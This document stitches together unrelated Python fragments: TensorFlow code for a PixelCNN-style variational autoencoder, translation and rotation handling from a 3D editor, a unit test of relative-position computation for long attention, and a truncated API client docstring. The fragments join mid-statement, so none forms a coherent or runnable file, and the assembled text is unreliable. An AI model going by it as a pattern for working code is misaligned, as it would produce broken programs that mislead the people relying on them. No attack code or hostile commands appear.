output = pixcnn_gated_nonlinearity(output_a, output_b)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
return shortcut + output
def EncFull(images):
output = images
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('EncFull.Res1', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs_stdev=1, inputs=output)
output = ResidualBlock('EncFull.Res2', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs_stdev=1, inputs=output)
output = ResidualBlock('EncFull.Res3', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs_stdev=np.sqrt(2), inputs=output)
output = ResidualBlock('EncFull.Res4', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs_stdev=np.sqrt(2), inputs=output)
output = ResidualBlock('EncFull.Res5', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), inputs=output)
output = ResidualBlock('EncFull.Res6', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), inputs=output)
# output = ResidualBlock('EncFull.Res7', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample='down', inputs_stdev=np.sqrt(3), inputs=output)
# output = tf.reshape(output, [-1, 4*4*DIM_3])
# output = lib.ops.linear.Linear('EncFull.Output', input_dim=4*4*DIM_3, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
output = tf.reduce_mean(output, reduction_indices=[2,3])
output = lib.ops.linear.Linear('EncFull.Output', input_dim=DIM_3, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
# output = ResidualBlock('EncFull.Res3', input_dim=DIM_3, output_dim=DIM_4, filter_size=3, resample='down', inputs_stdev=np.sqrt(3), inputs=output)
# output = ResidualBlock('EncFull.Res4Pre', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs_stdev=np.sqrt(4), inputs=output)
# output = tf.reshape(output, [-1, 4*4*DIM_4])
# output = lib.ops.linear.Linear('EncFull.ConvToFC', input_dim=4*4*DIM_4, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
return output
def DecFull(latents, images):
output = tf.clip_by_value(latents, -50., 50.)
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_1, initialization='glorot', inputs=output)
# output = tf.reshape(tf.tile(tf.reshape(output, [-1, DIM_1, 1]), [1, 1, 28*28]), [-1, DIM_1, 28, 28])
output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_3, initialization='glorot', inputs=output)
output = tf.reshape(tf.tile(tf.reshape(output, [-1, DIM_3, 1]), [1, 1, 49]), [-1, DIM_3, 7, 7])
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=4*4*DIM_3, initialization='glorot', inputs=output)
# output = tf.reshape(output, [-1, DIM_3, 4, 4])
# output = ResidualBlock('DecFull.Res1', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample='up', inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = output[:, :, :7, :7]
output = ResidualBlock('DecFull.Res2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res4', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res5', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res6', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res7', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=4*4*DIM_4, initialization='glorot', inputs=output)
# output = tf.reshape(output, [-1, DIM_4, 4, 4])
# output = ResidualBlock('DecFull.Res2Post', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res3', input_dim=DIM_4, output_dim=DIM_3, filter_size=3, resample='up', inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res3Post', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res4', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res4Post', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res5', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res5Post', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
# position-invariant latent projection
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_1, initialization='glorot', inputs=output)
# output = tf.tile(output, [1, HEIGHT*WIDTH])
# output = tf.reshape(output, [-1, DIM_1, HEIGHT, WIDTH])
if PIXEL_LEVEL_PIXCNN:
if EMBED_INPUTS:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
# Make the stdev of output and masked_images match
# output /= np.sqrt(6)
# Warning! Because of the masked convolutions it's very important that masked_images comes first in this concat
output = tf.concat(1, [masked_images, output])
output = ResidualBlock('DecFull.Pix2Res', input_dim=2*DIM_1, output_dim=DIM_PIX_1, filter_size=1, mask_type=('b', N_CHANNELS), inputs_stdev=1, inputs=output)
# output = ResidualBlock('DecFull.Pix2Res', input_dim=2*DIM_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=1, inputs=output)
# output = ResidualBlock('DecFull.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=np.sqrt(2), inputs=output)
# output = ResidualBlock('DecFull.Pix4Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=np.sqrt(2), inputs=output)
# output = ResidualBlock('DecFull.Pix5Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=np.sqrt(2), inputs=output)
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_PIX_1, output_dim=256*N_CHANNELS, filter_size=1, mask_type=('b', N_CHANNELS), he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_1, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
return tf.transpose(
tf.reshape(output, [-1, 256, N_CHANNELS, HEIGHT, WIDTH]),
[0,2,3,4,1]
)
def split(mu_and_logsig):
mu, logsig = tf.split(1, 2, mu_and_logsig)
# Restrict sigma to [0,1] and mu to [-2, 2]
# mu = 2. * tf.tanh(mu / 2.)
sig = 0.5 * (tf.nn.softsign(logsig)+1)
logsig = tf.log(sig)
return mu, logsig, sig
def clamp_logsig_and_sig(logsig, sig):
# Early during training (see BETA_ITERS), stop sigma from going too low
floor = 1. - tf.minimum(1., tf.cast(total_iters, 'float32') / BETA_ITERS)
log_floor = tf.log(floor)
return tf.maximum(logsig, log_floor), tf.maximum(sig, floor)
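# Illustrative note (added): the floor decays linearly from 1 at iteration 0 to 0 at
# BETA_ITERS, e.g. with BETA_ITERS = 1000: iter 0 -> floor 1.0, iter 500 -> 0.5,
# iter >= 1000 -> 0.0 (no clamping).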
scaled_images = (tf.cast(images, 'float32') - 128.) / 64.
embedded_images = lib.ops.embedding.Embedding('Embedding', 256, DIM_EMBED, images)
embedded_images = tf.transpose(embedded_images, [0,4,1,2,3])
embedded_images = tf.reshape(embedded_images, [-1, DIM_EMBED*N_CHANNELS, HEIGHT, WIDTH])
if MODE == 'one_level':
# Layer 1
if EMBED_INPUTS:
mu_and_logsig1 = EncFull(embedded_images)
else:
mu_and_logsig1 = EncFull(scaled_images)
mu1, logsig1, sig1 = split(mu_and_logsig1)
if VANILLA:
latents1 = mu1
else:
eps = tf.random_normal(tf.shape(mu1))
latents1 = mu1 + (eps * sig1)
if EMBED_INPUTS:
outputs1 = DecFull(latents1, embedded_images)
else:
outputs1 = DecFull(latents1, scaled_images)
reconst_cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
tf.reshape(outputs1, [-1, 256]),
tf.reshape(images, [-1])
)
)
# Assembly
# An alpha of exactly 0 can sometimes cause inf/nan values, so we're
# careful
cam = GD.cam()
lens_type = GD.cam.lens_type
near_point = Point3()
far_point = Point3()
GD.cam.lens.extrude(screen_pos, near_point, far_point)
rel_pt = lambda point: grid_origin.get_relative_point(cam, point)
near_point = rel_pt(near_point)
far_point = rel_pt(far_point)
if lens_type == "persp":
# the selected items should not move if the cursor points away from the
# plane of translation
if V3D(far_point - near_point) * self._transf_plane_normal < .0001:
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
point = Point3()
if self._transf_plane.intersects_line(point, near_point, far_point):
pos = grid_origin.get_relative_point(GD.world, self._transf_start_pos)
translation_vec = point - pos
else:
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
if self._transf_axis is not None:
if not snap_target_point or snap_settings["use_axis_constraints"]["translate"]:
translation_vec = translation_vec.project(self._transf_axis)
if snap_on and snap_tgt_type == "increment":
axis_constraints = GD["axis_constraints"]["translate"]
offset_incr = snap_settings["increment"]["translate"]
if axis_constraints == "view":
translation_vec = cam.get_relative_vector(grid_origin, translation_vec)
offset_incr /= cam.get_sx(grid_origin)
x, y, z = translation_vec
x = round(x / offset_incr) * offset_incr
y = round(y / offset_incr) * offset_incr
z = round(z / offset_incr) * offset_incr
translation_vec = Vec3(x, y, z)
if axis_constraints == "view":
translation_vec = grid_origin.get_relative_vector(cam, translation_vec)
if snap_on and snap_settings["use_axis_constraints"]["translate"]:
if snap_target_point:
pos = GD.world.get_relative_point(grid_origin, pos + translation_vec)
Mgr.do("set_projected_snap_marker_pos", pos)
else:
Mgr.do("set_projected_snap_marker_pos", None)
if GD["active_obj_level"] == "top":
self._selection.translate(self._objs_to_transform, translation_vec)
else:
self._selection.translate(translation_vec)
Mgr.do("transform_point_helpers")
return task.cont
def __init_rotation(self):
grid_origin = Mgr.get("grid").origin
axis_constraints = GD["axis_constraints"]["rotate"]
rotation_options = GD["transform_options"]["rotation"]
cam = GD.cam()
lens_type = GD.cam.lens_type
cam_pos = cam.get_pos(GD.world)
cam_vec = V3D(GD.world.get_relative_vector(cam, Vec3.forward()).normalized())
if axis_constraints == "view":
normal = cam_vec
self._screen_axis_vec = grid_origin.get_relative_vector(cam, Vec3.forward())
if not self._screen_axis_vec.normalize():
return
else:
axis_index = "xyz".index(axis_constraints)
axis1_index = axis_index - 2
axis2_index = axis_index - 1
axis1_vec = V3D()
axis1_vec[axis1_index] = 1.
axis2_vec = V3D()
axis2_vec[axis2_index] = 1.
axis1_vec = V3D(GD.world.get_relative_vector(grid_origin, axis1_vec))
axis2_vec = V3D(GD.world.get_relative_vector(grid_origin, axis2_vec))
normal = axis1_vec ** axis2_vec
if not normal.normalize():
return
self._rot_origin = Mgr.get("transf_center_pos")
self._transf_plane = Plane(normal, self._rot_origin)
drag_in_view_plane = False
drag_linear = rotation_options["drag_method"] == "linear"
if not drag_linear:
method_switch_threshold = rotation_options["method_switch_threshold"]
drag_method = rotation_options["drag_method"]
drag_in_view_plane = drag_method != "circular_in_rot_plane"
angle = max(cam_vec.angle_deg(normal), cam_vec.angle_deg(-normal)) - 90.
if axis_constraints != "view" and angle < method_switch_threshold:
drag_in_view_plane = True
drag_linear = rotation_options["alt_method"] == "linear"
self._drag_in_view_plane = drag_in_view_plane or drag_linear
self._drag_linear = drag_linear
snap_settings = GD["snap"]
snap_on = snap_settings["on"]["rotate"]
snap_tgt_type = snap_settings["tgt_type"]["rotate"]
if snap_on and snap_tgt_type != "increment":
rot_start_pos = self._transf_plane.project(self._transf_start_pos)
else:
rot_start_pos = Point3()
if lens_type == "persp":
line_start = cam_pos
else:
line_start = cam.get_relative_point(GD.world, self._transf_start_pos)
line_start.y -= 1000.
line_start = GD.world.get_relative_point(cam, line_start)
if not (self._transf_plane.intersects_line(rot_start_pos,
line_start, self._transf_start_pos) or self._drag_in_view_plane):
return
Mgr.do("init_rotation_gizmo_angle", rot_start_pos)
rot_start_vec = V3D(rot_start_pos - self._rot_origin)
rot_ref_vec = normal ** rot_start_vec
self._rot_start_vecs = (rot_start_vec, rot_ref_vec)
if not rot_start_vec.normalize():
return
if lens_type == "persp":
if normal * V3D(self._transf_plane.project(cam_pos) - cam_pos) < .0001:
normal *= -1.
if (not snap_on or snap_tgt_type == "increment") and (lens_type == "persp"
and not self._drag_in_view_plane):
# no rotation can occur if the cursor points away from the plane of
# rotation
if V3D(self._transf_start_pos - cam_pos) * normal < .0001:
return
if snap_on and snap_tgt_type == "increment":
self._snap_start_vecs = (V3D(rot_start_vec), V3D(rot_ref_vec))
self._total_angle = 0.
else:
self._total_angle = None
self._transf_plane_normal = normal
if GD["active_obj_level"] == "top":
self._selection.init_rotation(self._objs_to_transform)
else:
self._selection.init_rotation()
if self._drag_in_view_plane:
w, h = GD["viewport"]["size_aux"
if GD["viewport"][2] == "main" else "size"]
point = cam.get_relative_point(GD.world, self._rot_origin)
screen_pos = Point2()
GD.cam.lens.project(point, screen_pos)
x, y = screen_pos
x = (x + 1.) * .5 * w
y = -(1. - (y + 1.) * .5) * h
center = Point3(x, 0., y)
point = cam.get_relative_point(GD.world, self._transf_start_pos)
screen_pos = Point2()
GD.cam.lens.project(point, screen_pos)
x, y = screen_pos
x = (x + 1.) * .5 * w
y = -(1. - (y + 1.) * .5) * h
point = Point3(x, 0., y)
vec = point - center
angle = Vec3(1., 0., 0.).signed_angle_deg(vec.normalized(), Vec3(0., 1., 0.))
if drag_linear:
viz = self._rotation_viz["linear"]
viz.set_pos(point)
if not rotation_options["line_thru_gizmo_center"]:
x, y = GD["viewport"]["pos_aux"
if GD["viewport"][2] == "main" else "pos"]
mouse_pointer = Mgr.get("mouse_pointer", 0)
mouse_x, mouse_y = mouse_pointer.x, mouse_pointer.y
point2 = Point3(mouse_x - x, 0., -mouse_y + y)
vec = point2 - point
angle = Vec3(1., 0., 0.).signed_angle_deg(vec.normalized(), Vec3(0., 1., 0.))
viz.set_r(angle)
else:
viz = self._rotation_viz["circular"]
viz.set_r(angle)
if rotation_options["circle_center"] == "gizmo_center":
viz.set_pos(center)
else:
viz.set_pos(point)
if rotation_options["show_circle"]:
if not rotation_options["scale_circle_to_cursor"]:
viz.set_scale(rotation_options["circle_radius"])
elif rotation_options["circle_center"] == "gizmo_center":
viz.set_scale(vec.length())
else:
viz.set_scale(.1)
if rotation_options["show_line" if drag_linear else "show_circle"]:
if axis_constraints == "view":
color = (.5, .5, .5, 1.)
else:
color = VBase4()
color["xyz".index(axis_constraints)] = 1.
tex_stage = TextureStage.default
tex = viz.get_texture(tex_stage)
sampler = SamplerState(tex.default_sampler)
sampler.border_color = color
tex.default_sampler = sampler
viz.reparent_to(GD.viewport_origin)
Mgr.add_task(self.__rotate_selection, "transform_selection", sort=3)
def __rotate_selection(self, task):
# To rotate selected items, the new orientation is computed as the
# starting orientation with an angle added to it. This angle is measured
# in the plane of rotation (whose normal points in the direction of the
# chosen axis of rotation) between two vectors: the starting vector and the
# current vector, both originating at the center of transformation.
# The starting vector points to the initial "mouse ray"-item intersection
# point, while the current vector points to the current intersection of the
# mouse ray and the plane of rotation.
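# Illustrative sketch of the idea above (added; v_start, v_curr and n are informal
# names, not variables used in this method):
#   v_start = start_hit_point - rotation_center
#   v_curr  = current_hit_point - rotation_center
#   angle   = signed_angle(v_start, v_curr, about=n)   # n = rotation-plane normal
#   new_orientation = start_orientation rotated by angle about n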
rotation_vec = None
snap_settings = GD["snap"]
snap_on = snap_settings["on"]["rotate"]
snap_tgt_type = snap_settings["tgt_type"]["rotate"]
snap_target_point = None
axis_constraints = GD["axis_constraints"]["rotate"]
rotation_options = GD["transform_options"]["rotation"]
drag_in_view_plane = self._drag_in_view_plane
drag_linear = self._drag_linear
grid_origin = Mgr.get("grid").origin
if drag_in_view_plane:
viz = self._rotation_viz["linear" if drag_linear else "circular"]
show_viz = rotation_options["show_line" if drag_linear else "show_circle"]
viz.show() if show_viz else viz.hide()
if snap_on and snap_tgt_type != "increment":
snap_target_point = Mgr.get("snap_target_point")
if snap_target_point:
snap_target_point = GD.world.get_relative_point(grid_origin, snap_target_point)
pos = self._transf_plane.project(snap_target_point)
rotation_vec = V3D(pos - self._rot_origin)
if drag_in_view_plane:
viz.hide()
if not rotation_vec.normalize():
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
if snap_settings["use_axis_constraints"]["rotate"]:
if snap_target_point:
Mgr.do("set_projected_snap_marker_pos", pos)
else:
Mgr.do("set_projected_snap_marker_pos", None)
if rotation_vec is None:
if not GD.mouse_watcher.has_mouse():
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
cam = GD.cam()
lens_type = GD.cam.lens_type
if drag_in_view_plane:
x, y = GD["viewport"]["pos_aux"
if GD["viewport"][2] == "main" else "pos"]
mouse_pointer = Mgr.get("mouse_pointer", 0)
mouse_x, mouse_y = mouse_pointer.x, mouse_pointer.y
point = Point3(mouse_x - x, 0., -mouse_y + y)
vec = V3D(point - viz.get_pos())
if show_viz and not drag_linear and rotation_options["scale_circle_to_cursor"]:
viz.set_scale(max(1., vec.length()))
if drag_linear:
dir_vec = Vec3(1., 0., 0.) * viz.get_scale()[0]
dir_vec = GD.viewport_origin.get_relative_vector(viz, dir_vec)
full_roll_dist = rotation_options["full_roll_dist"]
angle = vec.project(dir_vec).length() * 360. / full_roll_dist
if vec * dir_vec < 0.:
angle *= -1.
angle_offset = angle // 360. + 1.
viz.set_scale(-1.)
use_angle_complement = True
else:
angle_offset = angle // 360.
viz.set_scale(1.)
use_angle_complement = False
else:
angle = Vec3.right().signed_angle_deg(vec.normalized(), Vec3.forward())
angle -= viz.get_r()
if axis_constraints == "view":
use_angle_complement = False
else:
vec = V3D()
vec["xyz".index(axis_constraints)] = 1.
if vec * grid_origin.get_relative_vector(GD.cam(), Vec3.forward()) < 0.:
angle *= -1.
use_angle_complement = True
else:
use_angle_complement = False
quat = Quat()
if axis_constraints == "view":
quat.set_from_axis_angle(angle, self._screen_axis_vec)
else:
hpr = VBase3()
hpr["zxy".index(axis_constraints)] = angle
quat.set_hpr(hpr)
vec = quat.xform(self._rot_start_vecs[0])
point = self._rot_origin + vec
near_point = point - self._transf_plane_normal
far_point = point + self._transf_plane_normal
else:
screen_pos = GD.mouse_watcher.get_mouse()
near_point = Point3()
far_point = Point3()
GD.cam.lens.extrude(screen_pos, near_point, far_point)
rel_pt = lambda point: GD.world.get_relative_point(cam, point)
near_point = rel_pt(near_point)
far_point = rel_pt(far_point)
if lens_type == "persp":
# the selected items should not rotate if the cursor points away from the
# plane of rotation
if V3D(far_point - near_point) * self._transf_plane_normal < .0001:
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
point = Point3()
if self._transf_plane.intersects_line(point, near_point, far_point):
rotation_vec = V3D(point - self._rot_origin)
if not rotation_vec.normalize():
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
if snap_on and snap_tgt_type == "increment":
angle_incr = snap_settings["increment"]["rotate"]
snap_vec, snap_ref_vec = self._snap_start_vecs
a = rotation_vec.angle_deg(snap_vec)
if a > angle_incr * .75:
n = (1 + a // angle_incr)
if rotation_vec * snap_ref_vec < 0.:
n *= -1.
# rotate both snap_vec and snap_ref_vec about the rotation plane
# normal by an angle equal to angle_incr * n
angle = angle_incr * n
self._total_angle += angle
q = Quat()
q.set_from_axis_angle(angle, self._transf_plane.get_normal())
snap_vec = V3D(q.xform(snap_vec))
self._snap_start_vecs = (snap_vec, V3D(q.xform(snap_ref_vec)))
rotation_vec = snap_vec
if rotation_vec is not None:
angle = self._rot_start_vecs[0].angle_deg(rotation_vec)
if self._rot_start_vecs[1] * rotation_vec < 0. and angle > .001:
angle = 360. - angle
rotation = Quat()
if axis_constraints == "view":
rotation.set_from_axis_angle(angle, self._screen_axis_vec)
else:
hpr = VBase3()
hpr["zxy".index(axis_constraints)] = angle
rotation.set_hpr(hpr)
if (snap_on and snap_tgt_type != "increment" and snap_target_point
| |
1, 2, 3], #
[0, 1, 2, 3], #
[0, 1, 2, 3], #
[-1, 0, 1, 2], #
[-1, 0, 1, 2], #
[-1, 0, 1, 2], #
[-2, -1, 0, 1], #
[-2, -1, 0, 1], #
[-2, -1, 0, 1], #
[-3, -2, -1, 0], #
[-3, -2, -1, 0], #
[-3, -2, -1, 0]
], #
[
[0, 1, 2, x], #
[0, 1, 2, x], #
[0, 1, 2, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[-3, -2, -1, x], #
[x, x, x, x], #
[x, x, x, x]
], #
[
[0, 1, 2, x], #
[0, 1, 2, x], #
[0, 1, 2, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[x, x, x, 0], #
[x, x, x, 0], #
[x, x, x, 0]
], #
[
[0, 1, 2, x], #
[0, 1, 2, x], #
[0, 1, 2, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-1, 0, 1, x], #
[-2, -1, 0, x], #
[-2, -1, 0, x], #
[x, x, 0, x], #
[x, x, 0, x], #
[x, x, 0, x], #
[x, x, -1, x]
]
]) #
positions_to_compare = np.isfinite(expected_relative_positions)
np.testing.assert_array_equal(
side_relative_positions[positions_to_compare],
expected_relative_positions[positions_to_compare])
inputs_mask = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
],
dtype=np.bool_)
segment_ids = [
[1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3], #
[1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 3, 3, 3, 3, 0, 0], #
[1, 1, 2, 3, 3, 4, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6], #
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], #
]
positions = [
[0, 1, 2, 3, 4, 5, 6, 0, 1, 2, 3, 4, 5, 0, 1, 2], #
[0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 0, 1, 2, 3, 0, 0], #
[0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 2, 3, 4, 5, 6, 7], #
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15] #
]
side_relative_positions = long_attention._make_side_relpos(
tokens_per_block,
inputs_mask,
segment_ids,
positions,
adopt_orphan_tokens=True)
expected_relative_positions = np.array([
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0]
], #
[
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x]
], #
[
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3]
], #
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0]
]
]) #
positions_to_compare = np.isfinite(expected_relative_positions)
np.testing.assert_array_equal(
side_relative_positions[positions_to_compare],
expected_relative_positions[positions_to_compare])
side_relative_positions = long_attention._make_side_relpos(
tokens_per_block,
inputs_mask,
segment_ids,
positions,
adopt_orphan_tokens=False)
expected_relative_positions = np.array([
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0]
], #
[
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[0, 1, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-1, 0, x, x, x], #
[-2, -1, x, x, x], #
[-2, -1, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, 0, x, x], #
[x, x, -1, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x]
], #
[
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[x, x, x, x, x], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2]
], #
[
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[0, 1, 2, 3, 4], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-1, 0, 1, 2, 3], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-2, -1, 0, 1, 2], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-3, -2, -1, 0, 1], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-4, -3, -2, -1, 0], #
[-5, -4, -3,
`items` list will be empty.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
continuation_token=continuation_token,
filter=filter,
ids=ids,
limit=limit,
names_or_owner_names=names_or_owner_names,
